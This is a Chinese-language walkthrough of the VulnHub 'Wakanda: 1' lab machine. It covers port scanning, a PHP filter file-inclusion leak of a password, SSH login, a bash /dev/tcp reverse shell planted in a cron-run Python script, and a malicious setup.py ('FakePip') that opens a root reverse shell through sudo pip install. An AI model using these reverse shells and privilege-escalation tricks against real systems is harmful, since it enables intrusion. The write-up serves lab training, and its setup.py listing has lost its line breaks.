当前位置: 首页 > news >正文

Wakanda: 1靶场复现【附代码】(权限提升)

靶机下载地址:

wakanda: 1 ~ VulnHubwakanda: 1, made by xMagass. Download & walkthrough links are available.icon-default.png?t=N7T8https://www.vulnhub.com/entry/wakanda-1,251/#download

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:DB:19:70'

1.2. 端口扫描

nmap 192.168.7.171 -p- -A

1.3. 目录扫描

dirb http://192.168.7.171

1.4. 敏感信息收集

whatweb http://192.168.7.171

2. WEB打点寻找漏洞点

2.1. 访问80端口

1.进了主页面,老规矩随便点点功能点,网页底线有些邮箱信息【mamadou】,暂时没实际用途 -> 查看网站源代码,有提示

2.拼接/?lang=fr试试看,没事大变换,但是url可能存在文件包含漏洞

3.尝试读取拼接路径读取网站源码

/?lang=php://filter/convert.base64-encode/resource=index

直接看网站源代码方便一些 -> 疑似base64加密 -> 解密得到密码

Niamey4Ever227!!!

2.2. SSH登录-GetShell

尝试用得到的密码搭配着邮箱信息登陆一下 -> 登录成功

mamadou:Niamey4Ever227!!!

切换至shell窗口

3. 权限提升

1查看当前用户的命令权限,没权限看 -> 查看内核版本,没有找到合适的提权方式

sudo -l
uname -a

2.在passwd中发现另一个用户 devops

3进入devops根目录,查看flag2文件,没有权限

4.看看其他关联文件

find / -user devops 2>/dev/null

发现 /srv/.antivirus.py 文件会将内容写入到 /tmp/test 中

cat /srv/.antivirus.py
open('/tmp/test','w').write('test')

将内容修改一下,尝试执行反弹shell

vi /srv/.antivirus.py
import os
os.system("echo 'bash -i >& /dev/tcp/192.168.7.36/4444 0>&1'|bash")

5.打开kali的监听【因为是计划任务稍等一会就会上线】

nc -lvvp 4444

查看第二个flag文件

6.查看当前用户的命令权限 -> 是all,尝试直接提权 -> 不大行

sudo -l
sudo su

7.网上找了一个相干的exp,创建一个setup.py,在其中写入

from setuptools import setup
from setuptools.command.install import install
import base64
import osclass CustomInstall(install):def run(self):install.run(self)RHOST = '192.168.7.36' reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 8888; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOSTencoded = base64.b64encode(reverse_shell)os.system('echo %s|base64 -d|bash' % encoded)setup(name='FakePip',version='0.0.1',description='This will exploit a sudoer able to /usr/bin/pip install *',url='https://github.com/0x00-0x00/fakepip',author='zc00l',author_email='andre.marques@esecurity.com.br',license='MIT',zip_safe=False,cmdclass={'install': CustomInstall})

修改为kali的ip

开启临时web服务,将其下载到 /tmp 目录中

wget http://192.168.7.36:8001/setup.py

kali开启监听

nc -lvnp 8888

靶机执行命令,成功反弹shell,提权成功

sudo /usr/bin/pip install . --upgrade --force-reinstall

http://www.lryc.cn/news/420054.html

相关文章:

  • 内核函数调试
  • Spring IOC使用DButil实现对数据库的操作
  • Android14音频进阶调试之命令播放mp3/aac非裸流音频(八十)
  • vue中怎么自定义组件
  • BM1反转链表[栈+头插法]
  • VisionPro二次开发学习笔记10-使用 PMAlign和Fixture固定Blob工具检测孔
  • 学单片机怎么在3-5个月内找到工作?
  • 探索设计模式:观察者模式
  • gradio之持续输入,持续输出(流式)
  • Git 常用命令指南:从入门到精通
  • Camera驱动 汇总表【小驰行动派】
  • SSRS rdlc报表 九 在.net core中使用RDLC报表
  • 力扣(2024.08.10)
  • Django-文件上传
  • [Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp00f自动化权限提升+Tmux进程劫持权限提升
  • 利用单张/多张图内参数标定 OpenCV Python
  • The Llama 3 Herd of Models 第7部分视觉实验部分全文
  • 亚信安慧AntDB-T:使用Brin索引提升OLAP查询性能以及节省磁盘空间
  • web渗透测试常用命令
  • Kylin系列(二)使用
  • CI/CD——CI持续集成实验
  • 2.4 大模型数据基础:预训练阶段数据详解 ——《带你自学大语言模型》系列
  • Kali Linux——网络安全的瑞士军刀
  • UML建模-测试用例
  • Python知识点:如何使用Socket模块进行网络编程
  • 培训第二十一天(mysql用户创建与授权、角色创建)
  • makefile基本语法
  • 白骑士的PyCharm教学实战项目篇 4.4 大数据处理与分析
  • 无人机之民用无人机用途分类篇
  • Android10 修改设备名称